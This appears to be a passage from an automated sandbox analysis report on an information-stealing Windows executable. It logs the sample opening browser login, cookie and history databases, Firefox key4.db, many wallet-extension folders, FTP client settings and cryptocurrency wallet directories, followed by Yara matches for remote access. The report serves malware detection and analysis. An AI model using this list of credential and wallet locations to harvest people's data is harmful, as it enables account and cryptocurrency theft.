Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Directory queried: C:\Users\user\Documents\TQDFJHPUIU Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Directory queried: C:\Users\user\Documents\TQDFJHPUIU Jump to behavior
Source: Yara match File source: 00000000.00000003.2259799476.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: p199AjsEFs.exe PID: 2268, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: Process Memory Space: p199AjsEFs.exe PID: 2268, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000003.00000002.2438234450.0000000000331000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2449611202.000000000144E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2391784243.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: HT94GNC6NP3AGR6EM8I9D3647.exe PID: 6316, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs